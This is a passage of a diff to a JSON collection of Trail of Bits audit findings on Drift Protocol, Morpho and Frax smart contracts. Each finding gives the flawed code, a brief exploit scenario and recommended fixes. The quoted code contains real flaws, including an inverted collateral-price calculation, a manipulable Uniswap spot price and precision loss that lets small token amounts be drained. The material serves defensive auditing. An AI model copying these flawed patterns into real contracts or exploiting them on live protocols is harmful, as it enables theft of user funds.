) and unwrap to handle errors resulting from peg-related calculations. An overflow or underflow could result from an invalid input to the function. An error should be returned in such cases. budget_delta_peg = budget_i128 .safe_add(adjustment_cost.abs())? .safe_mul(PEG_PRECISION_I128)? .safe_div(per_peg_cost)?; budget_delta_peg_magnitude = budget_delta_peg.unsigned_abs(); new_peg = if budget_delta_peg > 0 { ... } else if market.amm.peg_multiplier > budget_delta_peg_magnitude { market .amm .peg_multiplier .safe_sub(budget_delta_peg_magnitude) .unwrap() } else { 1 }; Figure 9.1: programs/drift/src/math/repeg.rs#L349L369 Running Clippy with the following command identifies 66 locations in the drift package where expect or unwrap is used: cargo clippy -p drift -- -A clippy::all -W clippy::expect_used -W clippy::unwrap_used Many of those uses appear to be related to invalid input. Exploit Scenario Alice, a Drift Protocol developer, observes a panic in the Drift Protocol codebase. Alice ignores the panic, believing that it is caused by user error, but it is actually caused by a bug she introduced. Recommendations Short term, reserve the use of panics for programmer errors. Have relevant areas of the code return Result::Err on user errors. Adopting such a policy will help to distinguish the two types of errors when they occur. Long term, consider denying the following Clippy lints: clippy::expect_used clippy::unwrap_used clippy::panic Although this will not prevent all panics, it will prevent many of them.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2352,29 +5110,29 @@ ] }, { - "title": "8. Risk of loss of precision in division operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "A common pattern in the codebase is to divide a user's debt by the total supply of a token; a loss of precision in these division operations could occur, which means that the supply delta would not account for the entire matched delta amount. The impact of this potential loss of precision requires further investigation. For example, the borrowLogic method uses this pattern: toWithdraw += matchedDelta; remainingToBorrow -= matchedDelta; delta.p2pSupplyDelta -= matchedDelta.div(poolSupplyIndex); emit P2PSupplyDeltaUpdated(_poolTokenAddress, delta.p2pSupplyDelta); Figure 8.1: Part of the borrowLogic() method Here, if matchedDelta is not a multiple of poolSupplyIndex, the remainder would not be taken into account. In an extreme case, if matchedDelta is smaller than poolSupplyIndex, the result of the division operation would be zero. An attacker could exploit this loss of precision to extract small amounts of underlying tokens sitting in the Morpho contract. Exploit Scenario Bob transfers some Dai to the Morpho contract by mistake. Eve sees this transfer, deposits some collateral, and then borrows an amount of Dai from Morpho small enough that it does not affect Eve's debt. Eve withdraws her deposited collateral and walks out with Bob's Dai. Further investigation into this exploit scenario is required. Recommendations Short term, add checks to validate input data to prevent precision issues in division operations. Long term, review all the arithmetic that is vulnerable to rounding issues.", + "title": "10.
Testing code used in production ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "In some locations in the Drift Protocol codebase, testing code is mixed with production code with no way to discern between them. Testing code should be clearly indicated as such and guarded by #[cfg(test)] to avoid being called in production. Examples appear in figures 10.1 and 10.2. The OracleMap struct has a quote_asset_price_data field that is used only when get_price_data is passed a default Pubkey. Similarly, the AMM implementation contains functions that are used only for testing and are not guarded by #[cfg(test)]. pub struct OracleMap<'a> { oracles: BTreeMap, price_data: BTreeMap, pub slot: u64, pub oracle_guard_rails: OracleGuardRails, pub quote_asset_price_data: OraclePriceData, } impl<'a> OracleMap<'a> { ... pub fn get_price_data(&mut self, pubkey: &Pubkey) -> DriftResult<&OraclePriceData> { if pubkey == &Pubkey::default() { return Ok(&self.quote_asset_price_data); } Figure 10.1: programs/drift/src/state/oracle_map.rs#L22L47 impl AMM { pub fn default_test() -> Self { let default_reserves = 100 * AMM_RESERVE_PRECISION; // make sure tests don't have the default sqrt_k = 0 AMM { Figure 10.2: programs/drift/src/state/perp_market.rs#L490L494 Drift Protocol has indicated that the quote_asset_price_data field (figure 10.1) is used in production. This raises concerns because there is currently no way to set the contents of this field, and no asset's price is perfectly constant (e.g., even stablecoins' prices fluctuate). For this reason, we have changed this finding's severity from Informational to Undetermined. Exploit Scenario Alice, a Drift Protocol developer, introduces code that calls the default_test function, not realizing it is intended only for testing. Alice introduces a bug as a result. Recommendations Short term, to the extent possible, avoid mixing testing and production code by, for example, using separate data types and storing the code in separate files. When testing and production code must be mixed, clearly mark the testing code as such, and guard it with #[cfg(test)]. These steps will help to ensure that testing code is not deployed in production. Long term, as new code is added to the codebase, ensure that the aforementioned standards are maintained. Testing code is not typically held to the same standards as production code, so it is more likely to include bugs.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "1. Testing is not routine ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Frax Solidity repository does not have reproducible tests that can be run locally. Having reproducible tests is one of the best ways to ensure a codebase's functional correctness. This finding is based on the following events: We tried to carry out the instructions in the Frax Solidity README at commit 31dd816. We were unsuccessful. We reached out to Frax Finance for assistance. Frax Finance in turn pushed eight additional commits to the Frax Solidity repository (not counting merge commits). With these changes, we were able to run some of the tests, but not all of them. These events suggest that tests require substantial effort to run (as evidenced by the eight additional commits), and that they were not functional at the start of the assessment.
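The guard recommended in finding 10 is mechanical to apply. A minimal sketch, with Amm as a stand-in type rather than Drift's AMM:

// Test-only constructors compiled out of production builds via #[cfg(test)].
pub struct Amm { pub sqrt_k: u128 }

impl Amm {
    pub fn new(sqrt_k: u128) -> Self { Amm { sqrt_k } }

    // Available to `cargo test` only; production code cannot call it.
    #[cfg(test)]
    pub fn default_test() -> Self { Amm { sqrt_k: 1 } }
}

fn main() {
    assert_eq!(Amm::new(100).sqrt_k, 100);
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn default_test_is_visible_in_tests() {
        assert_eq!(Amm::default_test().sqrt_k, 1);
    }
}

Any production call to default_test then becomes a compile error instead of a latent bug.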
Exploit Scenario Eve exploits a flaw in a Frax Solidity contract. The flaw would likely have been revealed through unit tests. Recommendations Short term, develop reproducible tests that can be run locally for all contracts. A comprehensive set of unit tests will help expose errors, protect against regressions, and provide a sort of documentation to users. Long term, incorporate unit testing into the CI process: Run the tests specific to contract X when a push or pull request affects contract X. Run all tests before deploying any new code, including updates to existing contracts. Automating the testing process will help ensure the tests are run regularly and consistently.", + "title": "11. Inconsistent use of checked arithmetic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "In several locations, the Drift Protocol codebase uses unchecked arithmetic. For example, in calculate_margin_requirement_and_total_collateral_and_liability_info (figure 11.1), the variable num_perp_liabilities is used as an operand in both a checked and an unchecked operation. To protect against overflows and underflows, unchecked arithmetic should be used sparingly. num_perp_liabilities += 1; } with_isolated_liability &= margin_requirement > 0 && market.contract_tier == ContractTier::Isolated; } if num_spot_liabilities > 0 { validate!( margin_requirement > 0, ErrorCode::InvalidMarginRatio, \"num_spot_liabilities={} but margin_requirement=0\", num_spot_liabilities )?; } let num_of_liabilities = num_perp_liabilities.safe_add(num_spot_liabilities)?; Figure 11.1: programs/drift/src/math/margin.rs#L499L515 Note that adding the following to the crate root will cause Clippy to fail the build whenever unchecked arithmetic is used: #![deny(clippy::integer_arithmetic)] Exploit Scenario Alice, a Drift Protocol developer, unwittingly introduces an arithmetic overflow bug into the codebase. The bug would have been revealed by the use of checked arithmetic. However, because unchecked arithmetic is used, the bug goes unnoticed. Recommendations Short term, add the #![deny(clippy::integer_arithmetic)] attribute to the drift crate root. Add #[allow(clippy::integer_arithmetic)] in rare situations where code is performance critical and its safety can be guaranteed through other means. Taking these steps will reduce the likelihood of overflow or underflow bugs residing in the codebase. Long term, if additional Solana programs are added to the codebase, ensure the #![deny(clippy::integer_arithmetic)] attribute is also added to them. This will reduce the likelihood that newly introduced crates contain overflow or underflow bugs.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "2. No clear mapping from contracts to tests ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "There are 405 Solidity files within the contracts folder [1], but there are only 80 files within the test folder [2]. Thus, it is not clear which tests correspond to which contracts. The number of contracts makes it impractical for a developer to run all tests when working on any one contract. Thus, to test a contract effectively, a developer will need to know which tests are specific to that contract. Furthermore, as per TOB-FRSOL-001, we recommend that the tests specific to contract X be run when a push or pull request affects contract X.
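Finding 11's recommended pattern, reduced to a sketch: a checked operation that surfaces overflow as a Result instead of panicking or wrapping. Drift's actual safe_add lives in its math helpers; the helper and MathError type below are our illustration.

// Checked arithmetic returning Err on overflow, never panicking or wrapping.
#[derive(Debug, PartialEq)]
struct MathError;

fn safe_add(a: u64, b: u64) -> Result<u64, MathError> {
    a.checked_add(b).ok_or(MathError)
}

fn main() {
    assert_eq!(safe_add(1, 2), Ok(3));
    assert_eq!(safe_add(u64::MAX, 1), Err(MathError)); // overflow becomes an Err
}

With #![deny(clippy::integer_arithmetic)] at the crate root, a bare a + b fails the lint, steering contributors toward helpers of this shape.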
To apply this recommendation, a mapping from the contracts to their relevant tests is needed. Exploit Scenario Alice, a Frax Finance developer, makes a change to a Frax Solidity contract. Alice is unable to determine the file that should be used to test the contract and deploys the contract untested. The contract is exploited using a bug that would have been revealed by a test. Recommendations Short term, for each contract, produce a list of tests that exercise that contract. If any such list is empty, produce tests for that contract. Having such lists will help facilitate contract testing following a change to it. Long term, as per TOB-FRSOL-001, incorporate unit testing into the CI process by running the tests specific to contract X when a push or pull request affects contract X. Automating the testing process will help ensure the tests are run regularly and consistently. [1] find contracts -name '*.sol' | wc -l [2] find test -type f | wc -l", + "title": "12. Inconsistent and incomplete exchange status checks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Drift Protocol's representation of the exchange's status has several problems: The exchange's status is represented using an enum, which does not allow more than one individual operation to be paused (figures 12.1 and 12.2). As a result, an administrator could inadvertently unpause one operation by trying to pause another (figure 12.3). The ExchangeStatus variants do not map cleanly to exchange operations. For example, handle_transfer_deposit checks whether the exchange status is WithdrawPaused (figure 12.4). The function's name suggests that the function checks whether transfers or deposits are paused. The ExchangeStatus is checked in multiple inconsistent ways. For example, in handle_update_funding_rate (figure 12.5), both an access_control attribute and the body of the function include a check for whether the exchange status is FundingPaused. pub enum ExchangeStatus { Active, FundingPaused, AmmPaused, FillPaused, LiqPaused, WithdrawPaused, Paused, } Figure 12.1: programs/drift/src/state/state.rs#L36L44 #[account] #[derive(Default)] #[repr(C)] pub struct State { pub admin: Pubkey, pub whitelist_mint: Pubkey, ... pub exchange_status: ExchangeStatus, pub padding: [u8; 17], } Figure 12.2: programs/drift/src/state/state.rs#L8L33 pub fn handle_update_exchange_status( ctx: Context, exchange_status: ExchangeStatus, ) -> Result<()> { ctx.accounts.state.exchange_status = exchange_status; Ok(()) } Figure 12.3: programs/drift/src/instructions/admin.rs#L1917L1923 #[access_control( withdraw_not_paused(&ctx.accounts.state) )] pub fn handle_transfer_deposit( ctx: Context, market_index: u16, amount: u64, ) -> anchor_lang::Result<()> { Figure 12.4: programs/drift/src/instructions/user.rs#L466L473 #[access_control( market_valid(&ctx.accounts.perp_market) funding_not_paused(&ctx.accounts.state) valid_oracle_for_perp_market(&ctx.accounts.oracle, &ctx.accounts.perp_market) )] pub fn handle_update_funding_rate( ctx: Context, perp_market_index: u16, ) -> Result<()> { ... let is_updated = controller::funding::update_funding_rate( perp_market_index, perp_market, &mut oracle_map, now, &state.oracle_guard_rails, matches!(state.exchange_status, ExchangeStatus::FundingPaused), None, )?; ...
} Figure 12.5: programs/drift/src/instructions/keeper.rs#L1027L1078 The Medium post describing the incident that occurred around May 11, 2022, suggests that the exchange's pausing mechanisms contributed to the incident's subsequent fallout: The protocol did not have a kill-switch where only withdrawals were halted. The protocol was paused in the second pause to prevent a further drain of user funds. This suggests that the pausing mechanisms should receive heightened attention to reduce the damage should another incident occur. Exploit Scenario Mallory tricks an administrator into pausing funding after withdrawals have already been paused. By pausing funding, the administrator unwittingly unpauses withdrawals. Recommendations Short term: Represent the exchange's status as a set of flags. This will allow individual operations to be paused independently of one another. Ensure exchange statuses map cleanly to the operations that can be paused. Add documentation where there is potential for confusion. This will help ensure developers check the proper exchange statuses. Adopt a single approach for checking the exchange's status and apply it consistently throughout the codebase. If an exception must be made for a check, explain why in a comment near that check. Adopting such a policy will reduce the likelihood that a missing check goes unnoticed. Long term, periodically review the exchange status checks. Since the exchange status checks represent a form of access control, they deserve heightened scrutiny. Moreover, the exchange's pausing mechanisms played a role in past incidents.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -2382,49 +5140,49 @@ ] }, { - "title": "3. amoMinterBorrow cannot be paused ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The amoMinterBorrow function does not check for any of the paused flags or whether the minter's associated collateral type is enabled. This reduces the FraxPoolV3 custodian's ability to limit the scope of an attack. The relevant code appears in figure 3.1. The custodian can set recollateralizePaused[minter_col_idx] to true if there is a problem with recollateralization, and collateralEnabled[minter_col_idx] to false if there is a problem with the specific collateral type. However, amoMinterBorrow checks for neither of these. // Bypasses the gassy mint->redeem cycle for AMOs to borrow collateral function amoMinterBorrow(uint256 collateral_amount) external onlyAMOMinters { // Checks the col_idx of the minter as an additional safety check uint256 minter_col_idx = IFraxAMOMinter(msg.sender).col_idx(); // Transfer TransferHelper.safeTransfer(collateral_addresses[minter_col_idx], msg.sender, collateral_amount); } Figure 3.1: contracts/Frax/Pools/FraxPoolV3.sol#L552-L559 Exploit Scenario Eve discovers and exploits a bug in an AMO contract. The FraxPoolV3 custodian discovers the attack but is unable to stop it. The FraxPoolV3 owner is required to disable the AMO contracts. This occurs after significant funds have been lost. Recommendations Short term, require recollateralizePaused[minter_col_idx] to be false and collateralEnabled[minter_col_idx] to be true for a call to amoMinterBorrow to succeed. This will help the FraxPoolV3 custodian to limit the scope of an attack. Long term, regularly review all uses of contract modifiers, such as collateralEnabled. Doing so will help to expose bugs like the one described here.", + "title": "13.
Spot market access controls are incomplete ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Functions in admin.rs involving perpetual markets verify that the market is valid, i.e., not delisted (figure 13.1). However, functions involving spot markets do not include such checks (e.g., figure 13.2). Drift Protocol has indicated that the spot market implementation is incomplete. #[access_control( market_valid(&ctx.accounts.perp_market) )] pub fn handle_update_perp_market_expiry( ctx: Context, expiry_ts: i64, ) -> Result<()> { Figure 13.1: programs/drift/src/instructions/admin.rs#L676L682 pub fn handle_update_spot_market_expiry( ctx: Context, expiry_ts: i64, ) -> Result<()> { Figure 13.2: programs/drift/src/instructions/admin.rs#L656L660 A similar example concerning whether the exchange is paused appears in figures 13.3 and 13.4. #[access_control( exchange_not_paused(&ctx.accounts.state) )] pub fn handle_place_perp_order(ctx: Context, params: OrderParams) -> Result<()> { Figure 13.3: programs/drift/src/instructions/user.rs#L687L690 pub fn handle_place_spot_order(ctx: Context, params: OrderParams) -> Result<()> { Figure 13.4: programs/drift/src/instructions/user.rs#L1022L1023 Exploit Scenario Mallory tricks an administrator into making a call that re-enables an expiring spot market. Mallory profits by trading against the should-be-expired spot market. Recommendations Short term, add the missing access controls to the spot market functions in admin.rs. This will ensure that an administrator cannot accidentally perform an operation on an expired spot market. Long term, add tests to verify that each function involving spot markets fails when invoked on an expired spot market. This will increase confidence that the access controls have been implemented correctly.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "4. Array updates are not constant time ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "In several places, arrays are allowed to grow without bound, and those arrays are searched linearly. If an array grows too large and the block gas limit is too low, such a search would fail. An example appears in figure 4.1. Minters are pushed to but never popped from minters_array. When a minter is removed from the array, its entry is searched for and then set to 0. Note that the cost of such a search is proportional to the searched-for entry's index within the array. Thus, there will eventually be entries that cannot be removed under the current block gas limits because their positions within the array are too large.
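The missing spot-market guard in finding 13 mirrors the perp-market check of figure 13.1. A plain-Rust sketch of the idea, with SpotMarket, MarketStatus, and ErrorCode as stand-ins for Drift's definitions:

// A market_valid-style guard for spot markets; all names are stand-ins.
#[derive(Debug, PartialEq)]
enum ErrorCode { MarketDelisted }

#[derive(PartialEq)]
enum MarketStatus { Active, Delisted }

struct SpotMarket { status: MarketStatus }

fn spot_market_valid(market: &SpotMarket) -> Result<(), ErrorCode> {
    if market.status == MarketStatus::Delisted {
        return Err(ErrorCode::MarketDelisted);
    }
    Ok(())
}

fn handle_update_spot_market_expiry(market: &SpotMarket, _expiry_ts: i64) -> Result<(), ErrorCode> {
    spot_market_valid(market)?; // the check the spot handlers currently lack
    // ... update the expiry timestamp ...
    Ok(())
}

fn main() {
    let delisted = SpotMarket { status: MarketStatus::Delisted };
    assert_eq!(handle_update_spot_market_expiry(&delisted, 0), Err(ErrorCode::MarketDelisted));
    let active = SpotMarket { status: MarketStatus::Active };
    assert!(handle_update_spot_market_expiry(&active, 0).is_ok());
}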
function removeMinter(address minter_address) external onlyByOwnGov { require(minter_address != address(0), \"Zero address detected\"); require(minters[minter_address] == true, \"Address nonexistant\"); // Delete from the mapping delete minters[minter_address]; // 'Delete' from the array by setting the address to 0x0 for (uint i = 0; i < minters_array.length; i++){ if (minters_array[i] == minter_address) { minters_array[i] = address(0); // This will leave a null in the array and keep the indices the same break; } } emit MinterRemoved(minter_address); } Figure 4.1: contracts/ERC20/__CROSSCHAIN/CrossChainCanonical.sol#L269-L285 Note that occasionally popping values from minters_array is not sufficient to address the issue. An array can be popped from occasionally, yet its size can still be unbounded. A similar problem exists in CrossChainCanonical.sol with respect to bridge_tokens_array. This problem appears to exist in many parts of the codebase. Exploit Scenario Eve tricks Frax Finance into adding her minter to the CrosschainCanonical contract. Frax Finance later decides to remove her minter, but is unable to do so because minters_array has grown too large and block gas limits are too low. Recommendations Short term, enforce the following policy throughout the codebase: an array's size is bounded, or the array is linearly searched, but never both. Arrays that grow without bound can be updated by moving computations, such as the computation of the index that needs to be updated, off-chain. Alternatively, the code that uses the array could be adjusted to eliminate the need for the array or to instead use a linked list. Adopting these changes will help ensure that the success of critical operations is not dependent on block gas limits. Long term, incorporate a check for this problematic code pattern into the CI pipeline. In the medium term, such a check might simply involve regular expressions. In the longer term, use Semgrep for Solidity if or when such support becomes stable. This will help to ensure the problem is not reintroduced into the codebase.", + "title": "14. Oracles can be invalid in at most one way ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The Drift Protocol codebase represents oracle validity using an enum, which does not allow an oracle to be invalid in more than one way. Furthermore, the code that determines an oracle's validity imposes an implicit hierarchy on the ways an oracle could be invalid. This design is fragile and likely to cause future problems. The OracleValidity enum is shown in figure 14.1, and the code that determines an oracle's validity is shown in figure 14.2. Note that if an oracle is, for example, both too volatile and too uncertain, the oracle will be labeled simply TooVolatile. A caller that does not account for this fact and simply checks whether an oracle is TooUncertain could overlook oracles that are both too volatile and too uncertain. pub enum OracleValidity { Invalid, TooVolatile, TooUncertain, StaleForMargin, InsufficientDataPoints, StaleForAMM, Valid, } Figure 14.1: programs/drift/src/math/oracle.rs#L21L29 pub fn oracle_validity( last_oracle_twap: i64, oracle_price_data: &OraclePriceData, valid_oracle_guard_rails: &ValidityGuardRails, ) -> DriftResult { ...
let oracle_validity = if is_oracle_price_nonpositive { OracleValidity::Invalid } else if is_oracle_price_too_volatile { OracleValidity::TooVolatile } else if is_conf_too_large { OracleValidity::TooUncertain } else if is_stale_for_margin { OracleValidity::StaleForMargin } else if !has_sufficient_number_of_data_points { OracleValidity::InsufficientDataPoints } else if is_stale_for_amm { OracleValidity::StaleForAMM } else { OracleValidity::Valid }; Ok(oracle_validity) } Figure 14.2: programs/drift/src/math/oracle.rs#L163L230 Exploit Scenario Alice, a Drift Protocol developer, is unaware of the implicit hierarchy among the OracleValidity variants. Alice writes code like oracle_validity != OracleValidity::TooUncertain and unknowingly introduces a bug into the codebase. Recommendations Short term, represent oracle validity as a set of flags. This will allow oracles to be invalid in more than one way, which will result in more robust and maintainable code. Long term, thoroughly test all code that relies on oracle validity. This will help ensure the code's correctness following the aforementioned change.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { - "title": "5. Incorrect calculation of collateral amount in redeemFrax ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The redeemFrax function of the FraxPoolV3 contract multiplies a FRAX amount with the collateral price to calculate the equivalent collateral amount (see the highlights in figure 5.1). This is incorrect. The FRAX amount should be divided by the collateral price instead. Fortunately, in the current deployment of FraxPoolV3, only stablecoins are used as collateral, and their price is set to 1 (also see issue TOB-FRSOL-009). This mitigates the issue, as multiplication and division by one are equivalent. If the collateral price were changed to a value different from 1, the exploit scenario described below would become possible, enabling users to steal all collateral from the protocol. if (global_collateral_ratio >= PRICE_PRECISION) { // 1-to-1 or overcollateralized collat_out = frax_after_fee .mul(collateral_prices[col_idx]) .div(10 ** (6 + missing_decimals[col_idx])); // PRICE_PRECISION + missing decimals fxs_out = 0; } else if (global_collateral_ratio == 0) { // Algorithmic fxs_out = frax_after_fee .mul(PRICE_PRECISION) .div(getFXSPrice()); collat_out = 0; } else { // Fractional collat_out = frax_after_fee .mul(global_collateral_ratio) .mul(collateral_prices[col_idx]) .div(10 ** (12 + missing_decimals[col_idx])); // PRICE_PRECISION ^2 + missing decimals fxs_out = frax_after_fee .mul(PRICE_PRECISION.sub(global_collateral_ratio)) .div(getFXSPrice()); // PRICE_PRECISIONS CANCEL OUT } Figure 5.1: Part of the redeemFrax function (FraxPoolV3.sol#412433) When considering the price of an entity X, it is common to think of it as the amount of another entity Y that has a value equivalent to 1 X. The unit of measurement of the price of X is therefore Y per X (Y/X). For example, the price of one apple is the number of units of another entity that can be exchanged for one unit of apple. That other entity is usually the local currency. For the US, the price of an apple is the number of US dollars that can be exchanged for an apple: price(apple) = $/apple. 1. Given the price of X and an amount of X, one can compute the equivalent amount of Y through multiplication: amount(Y) = amount(X) * price(X). 2. Given the price of X and an amount of Y, one can compute the equivalent amount of X through division: amount(X) = amount(Y) / price(X).
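Findings 12 and 14 converge on the same recommendation: replace a single enum with a set of independently settable flags. A bitmask sketch follows; the type and flag names are illustrative, and a production version might instead use the bitflags crate.

// A flags representation that lets one oracle be invalid in several ways at once.
#[derive(Clone, Copy, Default)]
struct OracleValidityFlags(u8);

impl OracleValidityFlags {
    const TOO_VOLATILE: u8 = 1 << 0;
    const TOO_UNCERTAIN: u8 = 1 << 1;
    const STALE_FOR_MARGIN: u8 = 1 << 2;

    fn set(&mut self, flag: u8) { self.0 |= flag; }
    fn contains(self, flag: u8) -> bool { self.0 & flag != 0 }
    fn is_valid(self) -> bool { self.0 == 0 }
}

fn main() {
    let mut validity = OracleValidityFlags::default();
    validity.set(OracleValidityFlags::TOO_VOLATILE);
    validity.set(OracleValidityFlags::TOO_UNCERTAIN);
    // Unlike the enum, both conditions are visible to every caller.
    assert!(validity.contains(OracleValidityFlags::TOO_VOLATILE));
    assert!(validity.contains(OracleValidityFlags::TOO_UNCERTAIN));
    assert!(!validity.contains(OracleValidityFlags::STALE_FOR_MARGIN));
    assert!(!validity.is_valid());
}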
In short, multiply if the known amount and price refer to the same entity; otherwise, divide. The getFraxInCollateral function correctly follows rule 2 by dividing a FRAX amount by the collateral price to get the equivalent collateral amount (figure 5.2). function getFRAXInCollateral(uint256 col_idx, uint256 frax_amount) public view returns (uint256) { return frax_amount.mul(PRICE_PRECISION).div(10 ** missing_decimals[col_idx]).div(collateral_prices[col_idx]); } Figure 5.2: The getFraxInCollateral function (FraxPoolV3.sol#242244) Exploit Scenario A collateral price takes on a value other than 1. This can happen through either a call to setCollateralPrice or future modifications that fetch the price from an oracle (also see issue TOB-FRSOL-009). A collateral asset is worth $1,000. Alice mints 1,000 FRAX for 1 unit of collateral. Alice then redeems 1,000 FRAX for 1 million units of collateral (1,000 * 1,000). As a result, Alice has stolen around $1 billion from the protocol. If the calculation were correct, Alice would have redeemed her 1,000 FRAX for 1 unit of collateral (1,000 / 1,000). Recommendations Short term, in FraxPoolV3.redeemFrax, use the existing getFraxInCollateral helper function (figure 5.2) to compute the collateral amount that is equivalent to a given FRAX amount. Long term, verify that all calculations involving prices use the above rules 1 and 2 correctly.", + "title": "15. Code duplication ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Various files in the programs/drift directory contain duplicate code, which can lead to incomplete fixes or inconsistent behavior (e.g., because the code is modified in one location but not all). As an example, the code in figure 15.1 appears nearly verbatim in the functions liquidate_perp, liquidate_spot, liquidate_borrow_for_perp_pnl, and liquidate_perp_pnl_for_deposit. // check if user exited liquidation territory let (intermediate_total_collateral, intermediate_margin_requirement_with_buffer) = if !canceled_order_ids.is_empty() || lp_shares > 0 { ... // 37 lines (intermediate_total_collateral, intermediate_margin_requirement_plus_buffer, ) } else { (total_collateral, margin_requirement_plus_buffer) }; Figure 15.1: programs/drift/src/controller/liquidation.rs#L201L246 In some places, the text itself is not obviously duplicated, but the logic it implements is clearly duplicated. An example appears in figures 15.2 and 15.3. Such logical code duplication suggests the code does not use the right abstractions.
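One candidate abstraction for the logical duplication that finding 15 describes (figures 15.2 and 15.3 below repeat the same open/close bookkeeping) is a helper that owns the user-count transition. PerpMarket here is a stand-in with only the relevant field, and the saturating operations stand in for Drift's safe_* helpers:

// One helper owns the open/close user-count transition instead of each call
// site re-implementing it.
struct PerpMarket { number_of_users: u64 }

fn update_user_count(market: &mut PerpMarket, was_open: bool, is_open: bool) {
    match (was_open, is_open) {
        (false, true) => market.number_of_users = market.number_of_users.saturating_add(1), // opened
        (true, false) => market.number_of_users = market.number_of_users.saturating_sub(1), // closed
        _ => {} // no transition
    }
}

fn main() {
    let mut market = PerpMarket { number_of_users: 0 };
    update_user_count(&mut market, false, true); // position opens
    update_user_count(&mut market, true, true);  // position changes but stays open
    assert_eq!(market.number_of_users, 1);
}

A fix to the transition logic then lands in one place rather than in four liquidation functions.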
// Update Market open interest if let PositionUpdateType::Open = update_type { if position.quote_asset_amount == 0 && position.base_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_add(1)?; } market.number_of_users_with_base = market.number_of_users_with_base.safe_add(1)?; } else if let PositionUpdateType::Close = update_type { if new_base_asset_amount == 0 && new_quote_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_sub(1)?; } market.number_of_users_with_base = market.number_of_users_with_base.safe_sub(1)?; } Figure 15.2: programs/drift/src/controller/position.rs#L162L175 if position.quote_asset_amount == 0 && position.base_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_add(1)?; } position.quote_asset_amount = position.quote_asset_amount.safe_add(delta)?; market.amm.quote_asset_amount = market.amm.quote_asset_amount.safe_add(delta.cast()?)?; if position.quote_asset_amount == 0 && position.base_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_sub(1)?; } Figure 15.3: programs/drift/src/controller/position.rs#L537L547 Exploit Scenario Alice, a Drift Protocol developer, is asked to fix a bug in liquidate_perp. Alice does not realize that the bug also applies to liquidate_spot, liquidate_borrow_for_perp_pnl, and liquidate_perp_pnl_for_deposit, and fixes the bug in only liquidate_perp. Eve discovers that the bug is not fixed in one of the other three functions and exploits it. Recommendations Short term: Refactor liquidate_perp, liquidate_spot, liquidate_borrow_for_perp_pnl, and liquidate_perp_pnl_for_deposit to eliminate the code duplication. This will reduce the likelihood of an incomplete fix for a bug affecting more than one of these functions. Identify cases where the code uses the same logic, and implement abstractions to capture that logic. Ensure that code that relies on such logic uses the new abstractions. Consolidating similar pieces of code will make the overall codebase easier to reason about. Long term, adopt code practices that discourage code duplication. This will help to prevent this problem from recurring.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { - "title": "6. spotPriceOHM is vulnerable to manipulation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The OHM_AMO contract uses the Uniswap V2 spot price to calculate the value of the collateral that it holds. This price can be manipulated by making a large trade through the OHM-FRAX pool. An attacker can manipulate the apparent value of collateral and thereby change the collateralization rate at will. FraxPoolV3 appears to contain the most funds at risk, but any contract that uses FRAX.globalCollateralValue is susceptible to a similar attack. (It looks like Pool_USDC has buybacks paused, so it should not be able to burn FXS, at the time of writing.) function spotPriceOHM() public view returns (uint256 frax_per_ohm_raw, uint256 frax_per_ohm) { (uint256 reserve0, uint256 reserve1, ) = (UNI_OHM_FRAX_PAIR.getReserves()); // OHM = token0, FRAX = token1 frax_per_ohm_raw = reserve1.div(reserve0); frax_per_ohm = reserve1.mul(PRICE_PRECISION).div(reserve0.mul(10 ** missing_decimals_ohm)); } Figure 6.1: old_contracts/Misc_AMOs/OHM_AMO.sol#L174-L180 FRAX.globalCollateralValue loops through frax_pools_array, including OHM_AMO, and aggregates collatDollarBalance.
